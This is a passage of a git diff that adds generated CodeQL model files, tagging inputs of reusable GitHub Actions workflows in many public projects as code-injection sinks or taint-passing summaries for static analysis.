["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "input.run_command", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "input.working-directory", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "input.additional_envs", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_docker.yml", "*", "input.set_latest", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml new file mode 100644 index 000000000000..60e388c076bc --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["cloudfoundry/cli/.github/workflows/tests-integration-reusable.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml new file mode 100644 index 000000000000..2cdfb52d976f --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml", "*", "input.matrix-key", "output.result", "taint", "manual"] diff --git a/actions/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml new file mode 100644 index 000000000000..1aae8bd0fd4d --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "input.nox_session_test_sim", "code-injection", "generated"] + - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "input.nox_session_test_nosim", "code-injection", "generated"] + - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "input.group", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml new file mode 100644 index 000000000000..c157f1bbca13 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "input.extra-composer-options", "code-injection", "generated"] + - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "input.php-version", "code-injection", "generated"] + - ["codeigniter4/codeigniter4/.github/workflows/reusable-phpunit-test.yml", "*", "input.extra-composer-options", "code-injection", "generated"] + - ["codeigniter4/codeigniter4/.github/workflows/reusable-phpunit-test.yml", "*", "input.php-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml new file mode 100644 index 000000000000..c7e2c60b08e6 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "input.millargs", "code-injection", "generated"] + - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "input.buildcmd", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml new file mode 100644 index 000000000000..fa0afdae7691 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml @@ -0,0 +1,17 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.upgrade-plan-name", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.chain-upgrade-tag", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.relayer-type", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.relayer-tag", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.relayer-image", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.chain-b-tag", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.chain-a-tag", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.chain-image", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.test", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.test-entry-point", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-compatibility-workflow-call.yaml", "*", "input.test-suite", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-compatibility-workflow-call.yaml", "*", "input.test-file-directory", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml new file mode 100644 index 000000000000..11a756cc063f --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "input.latest", "code-injection", "generated"] + - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "input.image_version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml new file mode 100644 index 000000000000..748d28d75452 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["cryptomator/cryptomator/.github/workflows/get-version.yml", "*", "input.version", "code-injection", "generated"] + - ["cryptomator/cryptomator/.github/workflows/av-whitelist.yml", "*", "input.url", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml new file mode 100644 index 000000000000..5916205cea96 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "input.pr-number", "code-injection", "generated"] + - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "input.build-type", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml new file mode 100644 index 000000000000..b62e5e5599f9 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "input.name", "code-injection", "generated"] + - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "input.tag_name", "code-injection", "generated"] + - ["dafny-lang/dafny/.github/workflows/integration-tests-reusable.yml", "*", "input.all_platforms", "code-injection", "generated"] + - ["dafny-lang/dafny/.github/workflows/integration-tests-reusable.yml", "*", "input.num_shards", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml new file mode 100644 index 000000000000..6f841faecce8 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "input.mage-targets", "code-injection", "generated"] + - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "input.dev-engine", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml new file mode 100644 index 000000000000..3c986e3d00be --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "input.deploy_path", "code-injection", "generated"] + - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "input.envname", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml new file mode 100644 index 000000000000..32de8a5131df --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["datadog/dd-trace-go/.github/workflows/smoke-tests.yml", "*", "input.go-libddwaf-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml new file mode 100644 index 000000000000..a28e8e121d28 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["datadog/dd-trace-py/.github/workflows/lib-inject-publish.yml", "*", "input.ddtrace-version", "code-injection", "generated"] + - ["datadog/dd-trace-py/.github/workflows/build-and-publish-image.yml", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml new file mode 100644 index 000000000000..ed8f60f413ee --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "input.run_id", "code-injection", "generated"] + - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "input.source_id", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml new file mode 100644 index 000000000000..476d40b52061 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.s3_bucket_name", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.build_script_path", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.nightly_release", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.test_run", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.env_setup_script_path", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.target_branch", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.sha", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.package_test_command", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.version_number", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml new file mode 100644 index 000000000000..c8a534d031d7 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "input.nightly_release", "code-injection", "generated"] + - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "input.test_run", "code-injection", "generated"] + - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "input.target_branch", "code-injection", "generated"] + - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "input.version_number", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml new file mode 100644 index 000000000000..5d3b6e2a8845 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.s3_bucket_name", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.build_script_path", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.nightly_release", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.test_run", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.env_setup_script_path", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.target_branch", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.sha", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.package_test_command", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.version_number", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml new file mode 100644 index 000000000000..b402ab78ef5c --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["decidim/decidim/.github/workflows/test_app.yml", "*", "input.test_command", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml new file mode 100644 index 000000000000..2abf8ff1d320 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["defectdojo/django-defectdojo/.github/workflows/release-x-manual-helm-chart.yml", "*", "input.release_number", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml new file mode 100644 index 000000000000..4183d01143fd --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["dependencytrack/dependency-track/.github/workflows/_meta-build.yaml", "*", "input.app-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml new file mode 100644 index 000000000000..eebeabb0353c --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["devexpress/testcafe/.github/workflows/test-server.yml", "*", "input.test-script", "code-injection", "generated"] + - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "input.test-script", "code-injection", "generated"] + - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "input.display", "code-injection", "generated"] + - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "input.matrix-jobs-count", "code-injection", "generated"] + - ["devexpress/testcafe/.github/workflows/test-client.yml", "*", "input.test-script", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml new file mode 100644 index 000000000000..7279ad6d976f --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml @@ -0,0 +1,18 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "input.artifact-name", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "input.append-date-and-hash", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.artifact-name", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.append-date-and-hash", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.common-files", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.xml-dump-type-sizes", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.tests", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.docs", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.extras", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.stonesense", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.platform-files", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.launchdf", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.gcc-ver", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml new file mode 100644 index 000000000000..ccd29346a108 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "input.id", "code-injection", "generated"] + - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "input.type", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml new file mode 100644 index 000000000000..0d162f9c66b0 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["dragonwell-project/dragonwell11/.github/workflows/test.yml", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml new file mode 100644 index 000000000000..730a0fc622dd --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml @@ -0,0 +1,22 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.BINARY", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.SUDO", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.TARGET_NAME", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.EXTRA_ARGS", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.BUILT_EARTHLY_PATH", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-main.yml", "*", "input.BINARY", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-main.yml", "*", "input.SUDO", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "input.BINARY", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "input.SUDO", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "input.EXTRA_ARGS", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "input.BUILT_EARTHLY_PATH", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "input.TEST_TARGET", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "input.BINARY", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "input.SUDO", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "input.BINARY_COMPOSE", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "input.RUN_EARTHLY_TEST_ARGS", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "input.BUILT_EARTHLY_PATH", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml new file mode 100644 index 000000000000..7c74a66467b8 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["eclipse-vertx/vert.x/.github/workflows/ci.yml", "*", "input.profile", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml new file mode 100644 index 000000000000..af7c7e941118 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["eclipse-vertx/vertx-sql-client/.github/workflows/ci.yml", "*", "input.profile", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml new file mode 100644 index 000000000000..01a7939de43e --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["elastic/elasticsearch-net/.github/workflows/release.yml", "*", "input.solution", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml new file mode 100644 index 000000000000..efd1a84bfb5c --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml @@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["element-hq/element-desktop/.github/workflows/build_windows.yaml", "*", "input.version", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "input.config", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "input.version", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_macos.yaml", "*", "input.base-url", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_macos.yaml", "*", "input.version", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_linux.yaml", "*", "input.version", "code-injection", "generated"] + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "input.deploy", "output.deploy", "taint", "manual"] diff --git a/actions/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml new file mode 100644 index 000000000000..715a3861fd92 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["envoyproxy/envoy/.github/workflows/_load.yml", "*", "input.run-id", "output.run-id", "taint", "manual"] + - ["envoyproxy/envoy/.github/workflows/_load.yml", "*", "input.check-name", "output.check-name", "taint", "manual"] diff --git a/actions/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml new file mode 100644 index 000000000000..bad92ff76790 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "input.testTimeout", "code-injection", "generated"] + - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "input.count", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml new file mode 100644 index 000000000000..90503b3ad3e2 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["etcd-io/etcd/.github/workflows/tests-template.yaml", "*", "input.arch", "code-injection", "generated"] + - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "input.scenario", "code-injection", "generated"] + - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "input.testTimeout", "code-injection", "generated"] + - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "input.count", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml new file mode 100644 index 000000000000..3d6de142622a --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["eventstore/eventstore/.github/workflows/build-reusable.yml", "*", "input.arch", "code-injection", "generated"] + - ["eventstore/eventstore/.github/workflows/build-container-reusable.yml", "*", "input.container-runtime", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml new file mode 100644 index 000000000000..ab48425c038b --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - 